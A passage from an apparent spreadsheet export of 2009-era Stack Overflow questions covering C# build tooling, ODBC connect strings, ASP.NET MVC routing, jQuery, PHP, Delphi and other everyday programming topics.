&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Edit2:&lt;/em&gt;&lt;/strong&gt;
Taking @jon's recommendation to minimise build-time by not processing the .proto files if they haven't changed, I've knocked together a basic tool to check for me (this could probably be expanded to a full Custom-Build tool):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Diagnostics;
using System.IO;
namespace PreBuildChecker
{
    public class Checker
    {
        static int Main(string[] args)
        {
            try
            {
                Check(args);
                return 0;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
                return 1;
            }
        }
        public static void Check(string[] args)
        {
            if (args.Length &amp;lt; 3)
            {
                throw new ArgumentException(
                    "Command line must be supplied with source, target and command-line [plus options]");
            }
            string source = args[0];
            string target = args[1];
            string executable = args[2];
            string arguments = args.Length &amp;gt; 3 ? GetCommandLine(args) : null;
            FileInfo targetFileInfo = new FileInfo(target);
            FileInfo sourceFileInfo = new FileInfo(source);
            if (!sourceFileInfo.Exists) 
            {
                throw new ArgumentException(string.Format(
                    "Source file {0} not found", source));
            }
            if (!targetFileInfo.Exists || 
                sourceFileInfo.LastWriteTimeUtc &amp;gt; targetFileInfo.LastAccessTimeUtc)
            {
                Process process = new Process();
                process.StartInfo.FileName = executable;
                process.StartInfo.Arguments = arguments;
                process.StartInfo.ErrorDialog = true;
                Console.WriteLine(string.Format(
                     "Source newer than target, launching tool: {0} {1}",
                     executable,
                     arguments));
                process.Start();
            }
        }
        private static string GetCommandLine(string[] args)
        {
            string[] arguments = new string[args.Length - 3];
            Array.Copy(args, 3, arguments, 0, arguments.Length);
            return String.Join(" ", arguments);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My pre-build command is now (all on one line):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(SolutionDir)PreBuildChecker\$(OutDir)PreBuildChecker 
    $(ProjectDir)AddressBook.proto 
    $(ProjectDir)AddressBook.cs 
    c:\bin\protobuf\protogen 
      "-i:$(ProjectDir)AddressBook.proto" 
      "-o:$(ProjectDir)AddressBook.cs" 
      -t:c:\bin\protobuf\csharp.xslt
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>embedding an application within a c# program with gtk#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to embed a movie watching application like VLC into my C# program using the GTK# binding.&lt;/p&gt;
&lt;p&gt;Googling, I haven't seen many solutions that people have claimed to be easy or that work.&lt;/p&gt;
&lt;p&gt;Experiences? Help?&lt;/p&gt;
&lt;p&gt;Please!&lt;/p&gt;
&lt;p&gt;Thanks,
jbu&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggestions for writing a programming language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tips can you give a person who is looking to write a programming or script language? I
am not worried about how to program nor design a compiler but how to develop one quickly using tools and code generators.&lt;/p&gt;
&lt;p&gt;Last time i tried i coded it in c++ and the states and syntax took almost as long as writing the actual logic. I know the follow tools would help.&lt;/p&gt;
&lt;p&gt;I was thinking i could generate c++ code and have gcc compile that. Using the tools above how long would you estimate it would take to write a program or script language?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Variations on this question have been asked repeatedly, as far back as &lt;a href="http://stackoverflow.com/questions/1669/learning-to-write-a-compiler"&gt;Learning to Write a Compiler&lt;/a&gt;. &lt;a href="http://stackoverflow.com/questions/365602/creating-your-own-language#365636"&gt;Here is an incomplete list of SO resources&lt;/a&gt; on the topic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>seam-gen, netbeans and completion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I make &lt;a href="http://docs.jboss.org/seam/1.1BETA2/reference/en/html/gettingstarted.html" rel="nofollow"&gt;seam-gen&lt;/a&gt; work with &lt;a href="http://www.netbeans.org/" rel="nofollow"&gt;NetBeans&lt;/a&gt; 6.5 so that completion of tags (s:, ui:, rich:, ...) works? In the free-form project that seam-gen creates, this does not seam to work. If I create a standard NetBeans web application (File -&gt; New Project), completion does work though.&lt;/p&gt;
&lt;p&gt;Thanks,
m.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DSN-less ODBC connect string for legacy Sybase Adaptive Server Anywhere</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a failed response to this article: &lt;a href="http://www.vbrad.com/article.aspx?id=94" rel="nofollow"&gt;Sybase, VB and ADO&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I just did a VB6 project connecting to a legacy ASA 7 database. After failing to use ASAProv OLEDB provider altogether (for one reason or another) and much research, here is the connect string for OLEDB Provider for ODBC shim for a DSN-less ODBC driver connection:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Provider=MSDASQL.1;Driver={Adaptive Server Anywhere 7.0};CommLinks=TCPIP,SharedMemory;EngineName=&amp;lt;database_name&amp;gt;;UID=DBA;PWD=SQL&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;where &lt;code&gt;&amp;lt;database_name&amp;gt;&lt;/code&gt; is the instance name dbeng7.exe is running the db under. Check the engine log for 'Starting database "&lt;code&gt;&amp;lt;database_name&amp;gt;&lt;/code&gt;"'.&lt;/p&gt;
&lt;p&gt;You can find all the valid property names for an ODBC connect string by creating a system DSN, adjust settings and inspecting values &lt;code&gt;HKLM\SOFTWARE\ODBC\ODBC.INI\&amp;lt;system_dsn&amp;gt;&lt;/code&gt; key.&lt;/p&gt;
&lt;p&gt;The available ODBC drivers that can be used under Driver property of the MSDASQL provider connect string are subkeys of &lt;code&gt;HKLM\SOFTWARE\ODBC\ODBCINST.INI&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Apparently Sybase login passwords are case insensitive which I find quite hilarious.&lt;/p&gt;
&lt;p&gt;cheers&lt;br&gt;
&lt;code&gt;&amp;lt;/wqw&amp;gt;&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows 7 MSDN Expiration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have read that the public beta version of Windows 7 has an expiration on it, but does the MSDN Premium also expire on the same date?&lt;/p&gt;
&lt;p&gt;And if so, do you think that we might see a newer version before the expiration on MSDN?&lt;/p&gt;
&lt;p&gt;For the speed improvements alone I am contemplating moving my development PC to Windows 7 over Windows Vista, stability issues aside, I am an early adopter anyway and expect issues with beta operating systems.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Doing a range lookup in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list of non-overlaping ranges (ranges of numbers, e.g. 500-1000, 1001-1200 .. etc), is there an elegant and fast way to do lookup by only passing a number? I could use List.BinarySearch() or Array.BinarySearch() but I have to pass the type of the range object (Array.BinarySearch(T[], T)), I can pass a dummy range object and get the job done (only do the comparison with the range start) but I was wondering if this can be done in a cleaner way by only passing an integer and getting the range object, is there a way to achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# whats best method of saving dynamically created controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently saving a .net ( c# ) usercontrol to the disk as a XML file by saving each property as an element in the xml document. The file is used for later recreation of the controls at runtime. I am wondering if it is possible or better to save the control as a binary file. There would be many controls so I guess it would have to have a header section describing the location and length of each saved controls. Thoughts?&lt;/p&gt;
&lt;p&gt;Brad&lt;/p&gt;
&lt;p&gt;BTW this is a windows app&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;what I currently have inplace is a public member function that uses the propertyDescriptior class to itinerate through all the properties and create an xml document from that.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     PropertyDescriptorCollection pdc = TypeDescriptor.GetProperties(this);
        for (int i = 0; i &amp;lt;= pdc.Count - 1; i++)
        {   pdc[i].Name
	 pdc[i].PropertyType
	pdc[i].Category
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;I will look into creating the class Serializable - thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write a Vertical Right-Side IE Explorer Bar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written explorer bars (band object) before and &lt;strong&gt;AFAIK vertical explorer bars can only be on the left side&lt;/strong&gt;. However, I was amazed when I saw this explorer bar by HP that is docked on the right hand side instead:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3493/3204746881_58eb9706fc.jpg" alt="A vertical explorer bar on the right hand side" /&gt;&lt;/p&gt;
&lt;p&gt;I've searched up google for a bit and I can't find any resources on this. Does anyone know how to &lt;strong&gt;build a vertical right-sided explorer bar&lt;/strong&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Batch: Read only the filename from a variable with path and filename</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently looking for a way to take a variable in batch and only parse out the filename.&lt;/p&gt;
&lt;p&gt;For example, I pass my batch file a -s parameter from another application which is subsequently set to my source variable. The source file variable typically contains something like: C:\Program Files\myapp\Instance.1\Data\filetomove.ext.&lt;/p&gt;
&lt;p&gt;I assume to read from the end of the variable until the first "\" and set the result to a new variable filename but I have not been able to use the "for /f" commmand successfully. &lt;/p&gt;
&lt;p&gt;Any help would be much appreciated!&lt;/p&gt;
&lt;p&gt;Update: Only standard XP or Windows 2000/2003 available...(can't assume resource kits installed).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Workflow need to listen for multiple events</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a workflow where need to listen for multiple events any event will drive workflow further.&lt;/p&gt;
&lt;p&gt;some actions --&gt; Call external method --&gt; Here there 3 events any one would be the response.&lt;/p&gt;
&lt;p&gt;What kind of activity i can use there where i can have three event handler. Any event will drive it further.&lt;/p&gt;
&lt;p&gt;Thought of using state machine workflow but if there is anything i can use instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the differences between LLVM and java bytecode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I dont understand the difference between LLVM and the java (bytecode), what are they?&lt;/p&gt;
&lt;p&gt;-edit- by 'what are they' i mean the differences between LLVM and java (bytecode) not what are LLVM and java.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PostgreSQL Authentication Under XP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Windows XP and I've installed PostgreSQL 8.3.5-2. I can create databases via pgAdmin but not from Powershell. When I try, I get the following error:&lt;/p&gt;
&lt;pre&gt;createdb: could not connect to database postgres: FATAL:  password authentication failed for user "gvkv"&lt;/pre&gt;
&lt;p&gt;where postgres is the server's only user account and "gvkv" is the account I work under. I've tried creating a separate account just for the the server and installing under that account but the installer keeps crashing.&lt;/p&gt;
&lt;p&gt;More fundamentally, I want to create some Powershell scripts to automate various tasks of database creation and administration but at this point, I can't even create a data store!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the number of projects in a Visual Studio 9 solution impact the solution load and build times?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm specifically interested in solution load times &amp;amp; build times - does fewer solutions mean better performance?&lt;/p&gt;
&lt;p&gt;Note that I'm &lt;em&gt;not&lt;/em&gt; referring to the performance of the built application.&lt;/p&gt;
&lt;p&gt;Are load times and build times more efficient when working with a smaller number of projects?&lt;/p&gt;
&lt;p&gt;As a guide, we have 50-60 projects in our Visual Studio solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I disallow clicking on a link while an ajax request is in progress?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have "a" element which servers as button. It has no href attribute.&lt;/p&gt;
&lt;p&gt;I'm using jQuery to achieve very simple thing: on click start ajax request and prevent further clicks. After ajax completes, enable clicking. I don't use form or input button.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var contact= {
    send: function() {
        $.ajax({
            type: "POST",
            url: "ws/ContactService.asmx/SendEmail",
            data: '{"fromEmail":"' + $("#email").val() + '", "fromName":"' + $('#name').val() + '", "subject":"' + $('#subject').val() + '", "message":"' + $('#message').val() + '"}',
            contentType: "application/json; charset=utf-8",
            dataType: "json",
            error: function() {
                alert("Error");
            },
            success: function(msg) {
                alert(msg.d);
            },
            complete: function() {
            $("#send").text("Send");
            }
        });
    }
};
$(document).ready(function() {
    $("#send").("click", function() {
        $("#send").text("Sending...");       
        contact.send();
    });
}
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine, except that I can click on send as many times as I want and every click will produce new ajax request. How to prevent clicks on "a" element while ajax request is in progress?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>protecting adobe air apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am about to deliver an Adobe AIR app to a customer.
But it's my first delivery of any sort, I.e. I have
no experience whatsoever with licensing etc.&lt;/p&gt;
&lt;p&gt;Users of this app may or may not be online, so 
can't count on that. In fact it's 99% sure that
they will be offline.&lt;/p&gt;
&lt;p&gt;Nor do I expect them to very tech-savvy, who will
spend enough time scouting for ways to "crack" it.&lt;/p&gt;
&lt;p&gt;So, is there an okeish type of way to protect this
app. That is, I don't want people to simply copy
the installation folder, take it to another machine
and run it. It should be slightly harder than this.&lt;/p&gt;
&lt;p&gt;Oh, and I am also using PHP and MySql, with which
this AIR app communicates. So anything you guys could
help me with is very very welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restricting T to string and int?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have built myself a generic collection class which is defined like this. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class StatisticItemHits&amp;lt;T&amp;gt;{...}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This class can be used with &lt;code&gt;int&lt;/code&gt; and &lt;code&gt;string&lt;/code&gt; values only. However this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class StatisticItemHits&amp;lt;T&amp;gt; where T : string, int {...}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;won't compile. What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which editor would you give your mom to let her edit her own website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I mean this quite literally. A close relative wants to create her own website for her business and asked me for help. I've offered her to set up the website, take care of domain registration and all, but I don't have the time to design the website for her. So, I want to give her a software in which she can edit the page and publish it on her own.&lt;/p&gt;
&lt;p&gt;My feature-wish-list. The software should&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;of course, be easy-to-use, as she's not a pro at the computer&lt;/li&gt;
&lt;li&gt;be able to publish the website, once the ftp-connection has been entered&lt;/li&gt;
&lt;li&gt;have some predefined themes, but also the possibilites to define a custom theme&lt;/li&gt;
&lt;li&gt;offer a german UI, since she doesn't understand english&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I so far looked at Nvu (too complicated), zeta Producer (crashed even before I could start editing the first page), CityDesk (very promising, but still too complicated and not in german). I'm quite happy with &lt;a href="http://namu6.com"&gt;Namu6&lt;/a&gt;, but unfortunately, it is english only.&lt;/p&gt;
&lt;p&gt;I'd be happy for any suggestion.&lt;/p&gt;
&lt;p&gt;[edit]&lt;/p&gt;
&lt;p&gt;Some were asking for a  platform: She is only using windows, so Mac or Linux is not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse editor plugin: "ERROR" when opening file outside project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an editor plugin for eclipse. It works fine on files within eclipse projects, but when an external file is opened via the "File -&gt; Open File" menu (which works file with, e.g. Java files), I get a page displaying nothing but a horizontal blue line and the word "ERROR". The Error Log of eclipse is empty, as is the log file in the .metadata directory. &lt;/p&gt;
&lt;p&gt;What could cause this? How can I diagnose the error when I have no error message that tells me where to look? There doesn't seem to be a way to get more detailed logging from eclipse.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've found that the source of the problem is close to what jamesh mentioned, but not a ClassCastException - there simply is no &lt;code&gt;IDocument&lt;/code&gt; instance for the text viewer to display because &lt;code&gt;StorageDocumentProvider.createDocument()&lt;/code&gt; returns null. The reason for this is that  it only knows how to create documents for instances of &lt;code&gt;org.eclipse.ui.IStorageEditorInput&lt;/code&gt;, but in this case it gets an instance of &lt;code&gt;org.eclipse.ui.ide.FileStoreEditorInput&lt;/code&gt;, which does not implement that interface, but instead implements &lt;code&gt;org.eclipse.ui.IURIEditorInput&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending a password to a Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to send a password to a Windows Service?  Our application needs a password in order to start. I don't care that services are "normally" supposed to run without user interaction.  Its good enough for us that an operator can start the application and then log off.&lt;/p&gt;
&lt;p&gt;On a unix system, I would just echo the password over stdin but the service has no stdin.&lt;/p&gt;
&lt;p&gt;Currently, we use the DPAPI to just store the password using CryptProtectData.  While this, works, it presents other problems that are beginning to become troublesome.&lt;/p&gt;
&lt;p&gt;I'm guessing that I'll need to use some form of IPC between the service and the application that is sending the password but I'm not sure which method is appropriate, if any.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE automation: How to determine when a user-initiated navigation is taking place / has taken place?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Internet Explorer BHO (in c# .net) and want to identify either when a user initiates a navigation, or when a user-initiated navigation has completed. By user-initiated I mean clicking on a link or similar action. In particular if there are multiple frames in the document being loaded I want to treat them as a single 'navigation', but I can't think of any easy way to do this. I know the BeforeNavigate2 and DocumentComplete events, but can't see any way to differentiate between BeforeNavigate/DocumentComplete firing when a user has clicked on a link and it firing because a frame is loading.&lt;/p&gt;
&lt;p&gt;One possible solution I'm thinking is that the BeforeNavigate2 for the top frame always gets fired before that of the inner frames (obviously), and then the DocumentComplete of the child frames get called before the DocumentComplete of the top, which is always called last. So for instance I could increment a counter in BeforeNavigates and decrement it in DocumentComplete, and only when it's 0 is it a user-initiated navigation.&lt;/p&gt;
&lt;p&gt;But I'm not sure if I can rely on this or if there's a better way to do it. e.g. What happens if the user presses ESC after one of the frames but not all have finished loading: does the DocumentComplete of the top frame ever get called?&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does firefox know when an update is available for an extension (plugin)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the process of creating my first firefox extension and am starting to think about deployment.&lt;/p&gt;
&lt;p&gt;There is a nice discussion about creating an template &lt;a href="http://stackoverflow.com/questions/274639/how-to-create-a-quick-minimal-firefox-extension"&gt;here&lt;/a&gt; and signing the extension &lt;a href="http://stackoverflow.com/questions/129920/how-do-you-sign-your-firefox-extensions"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But later down the road ... how does firefox know that an extension has been updated?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I have a hit-point in VisualStudio that skips lines?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often run into the situation where I want to disable some code while debugging without actually changing the code.&lt;/p&gt;
&lt;p&gt;What I end up doing is having a break-point (usually conditional) and then when the break-point fires I perform a &lt;em&gt;Set Next Statement&lt;/em&gt;. This can be very labor intensive when the code is reached many times so I created a macro:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub Skip3Lines()
    DTE.ActiveDocument.Selection.LineDown(False, 3)
    DTE.Debugger.SetNextStatement()
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then changed my break-point to be a hit-point (&lt;code&gt;right-click -&amp;gt; When Hit...&lt;/code&gt;) and told it to execute this macro.&lt;/p&gt;
&lt;p&gt;Visual studio was all too happy to spit out the following dialog box:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;code&gt;---------------------------&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;Error&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;---------------------------&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;A macro called a debugger action which is not allowed while responding to an event or  while being run because a breakpoint was hit.&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;---------------------------&lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;OK   &lt;/code&gt;&lt;br /&gt;
  &lt;code&gt;---------------------------&lt;/code&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone know how to get around this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting WAN radio power off</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Like most laptops, mine (a Dell Inspiron 1420) has a small button which can be used to turn the wifi card on and off. Is there any way to detect that the radio has been turned off in a Win32 C program or service? I'm looking for a better way than to get the list of the visible access points, something that only depends on the state of that button.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update&lt;/em&gt; - the solution is monitoring hardware events with a Windows service. You can get some code that does that &lt;a href="http://www.codeproject.com/KB/system/Windows_Services.aspx" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update 2&lt;/em&gt; - after more research it seems that the hardware events are sent for the Bluetooth device that is disabled when you hit the radio off switch. So, hardware monitoring works only for laptops that have both internal Bluetooth and wifi (probably on the same card). I never found a definite solution to this problem and have to live with the Bluetooth-based heuristic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programming Problem - Fax Compression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm preparing to go to a computer science contest by completing problems from past contests. Most of them are pretty easy, but this one is bugging me...it seems simple but I'm just not being able to do it.&lt;/p&gt;
&lt;p&gt;If you have a string of ones and zeros:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;100111010001111100101010
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What would be the code to take that as an input and then output this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1:1 2:0 3:1 1:0 1:1 3:0 5:1 2:0 1:1 1:0 1:1 1:0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where the digit to the left of each colon is the number of times the digit after the colon appears.&lt;/p&gt;
&lt;p&gt;So, another example...inputting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1100011
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2:1 3:0 2:1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;According to the problem this is similar to the algorithm used to compress fax transmissions. &lt;/p&gt;
&lt;p&gt;An answer in java would be best, but all I'm really looking for is pseudocode or even thoughts on how to do it. &lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSON datetime between Python and JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to send a datetime.datetime object in serialized form from Python using &lt;a href="http://en.wikipedia.org/wiki/JSON"&gt;JSON&lt;/a&gt; and de-serialize in JavaScript using JSON. What is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to run ASP.NET MVC routes in different AppDomains?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having problems with thinking up a solution for the following. I got a blog which I recently upgraded from web forms to MVC. The blog is avalible in both swedish and english on two different domains and are running in the same web site in IIS.&lt;/p&gt;
&lt;p&gt;The problem is that I would like language specific urls on the both sites, like this:&lt;/p&gt;
&lt;p&gt;English: &lt;a href="http://codeodyssey.com/archive/2009/1/15/code-odyssey-the-next-chapter" rel="nofollow"&gt;http://codeodyssey.com/archive/2009/1/15/code-odyssey-the-next-chapter&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Swedish: &lt;a href="http://codeodyssey.se/arkiv/2009/1/15/code-odyssey-nasta-kapitel" rel="nofollow"&gt;http://codeodyssey.se/arkiv/2009/1/15/code-odyssey-nasta-kapitel&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;At the moment I have made this to work by registering the RouteTable on each request depending on which domain is called. My Global.asax Looks something like this (not the whole code):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static void RegisterRoutes(RouteCollection routes)
{
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
    string archiveRoute = "archive";
    if (Thread.CurrentThread.CurrentUICulture.ToString() == "sv-SE")
    {
        archiveRoute = "arkiv";
    }
    routes.MapRoute(
        "BlogPost",
        archiveRoute+"/{year}/{month}/{day}/{slug}",
        new { controller = "Blog", action = "ArchiveBySlug" }
        );
    routes.MapRoute(
        "Default",                                              // Route name
        "{controller}/{action}/{id}",                           // URL with parameters
        new { controller = "Home", action = "Index", id = "" }  // Parameter defaults
    );
    routes.MapRoute(
        "404-PageNotFound",
        "{*url}",
        new { controller = "Error", action = "ResourceNotFound" }
    );
}
void Application_BeginRequest(object sender, EventArgs e)
{
    //Check whcih domian the request is made for, and store the Culture
    string currentCulture = HttpContext.Current.Request.Url.ToString().IndexOf("codeodyssey.se") != -1 ? "sv-SE" : "en-GB";
    Thread.CurrentThread.CurrentCulture = CultureInfo.CreateSpecificCulture(currentCulture);
    Thread.CurrentThread.CurrentUICulture = new CultureInfo(currentCulture);
    RouteTable.Routes.Clear();
    RegisterRoutes(RouteTable.Routes);
    Bootstrapper.ConfigureStructureMap();
    ControllerBuilder.Current.SetControllerFactory(
        new CodeOdyssey.Web.Controllers.StructureMapControllerFactory()
        );
}
protected void Application_Start()
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works at the moment but I know it not a great solution. I have been getting a "Item has already been added. Key in dictionary" error when stating up this app and it does not seems stable at times.&lt;/p&gt;
&lt;p&gt;I would like to only set up my routes in the Application_Start as they should and not having to clear them on every request like I am doing now. Problem is that the request object does not exist and I have no way of knowing which of the language specific routes I should register.&lt;/p&gt;
&lt;p&gt;Been reading about the AppDomain but could not find many examples on how to use it on a web site. I'we been thinking to star something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void Application_Start()
{
   AppDomain.CreateDomain("codeodyssey.se");
   AppDomain.CreateDomain("codeodyssey.com");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then registring each web sites routes in each app domain and send the requests to one of them based on the url. Can't find any examples on how to work with AppDomains in this manner.&lt;/p&gt;
&lt;p&gt;Am I completely off track? Or is there a better solution for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best method to merge two PHP objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have two PHP5 objects and would like to merge the content of one into the second. There are no notion of subclasses between them so the solutions described in the following topic cannot apply.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/119281/how-do-you-copy-a-php-object-into-a-different-object-type"&gt;How do you copy a PHP object into a different object type&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//We have this:
$objectA-&amp;gt;a;
$objectA-&amp;gt;b;
$objectB-&amp;gt;c;
$objectB-&amp;gt;d;
//We want the easiest way to get:
$objectC-&amp;gt;a;
$objectC-&amp;gt;b;
$objectC-&amp;gt;c;
$objectC-&amp;gt;d;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Remarks:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;These are objects, not classes.&lt;/li&gt;
&lt;li&gt;The objects contain quite a lot of fields so a &lt;strong&gt;foreach&lt;/strong&gt; would be quite slow.&lt;/li&gt;
&lt;li&gt;So far we consider transforming objects A and B into arrays then merging them using &lt;strong&gt;array_merge()&lt;/strong&gt; before re-transforming into an object but we can't say we are proud if this.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Fast read/write from file in delphi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am loading a file into a array in binary form this seems to take a while
is there a better faster more efficent way to do this.
i am using a similar method for writing back to the file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;procedure openfile(fname:string);
var
    myfile: file;
    filesizevalue,i:integer;
begin
  assignfile(myfile,fname);
  filesizevalue:=GetFileSize(fname); //my method
  SetLength(dataarray, filesizevalue);
  i:=0;
  Reset(myFile, 1);
  while not Eof(myFile) do
    begin
      BlockRead(myfile,dataarray[i], 1);
      i:=i+1;
    end;
  CloseFile(myfile);
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Does PHP feature short hand syntax for objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In javascript you can easily create objects and Arrays like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aObject = { foo:'bla', bar:2 };
var anArray = ['foo', 'bar', 2];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Are simialar things possible in PHP?&lt;br /&gt;
I know that you can easily create an array using the array function, that hardly is more work then the javascript syntax, but is there a similar syntax for creating objects? Or should I just use associative arrays?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$anArray = array('foo', 'bar', 2);
$anObjectLikeAssociativeArray = array('foo'=&amp;gt;'bla',
                                      'bar'=&amp;gt;2);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So to summarize:&lt;br /&gt;
Does PHP have javascript like object creation or should I just use associative arrays?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Android : Getting file name from camera?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have run into a small issue with something that I am probably just overlooking.&lt;/p&gt;
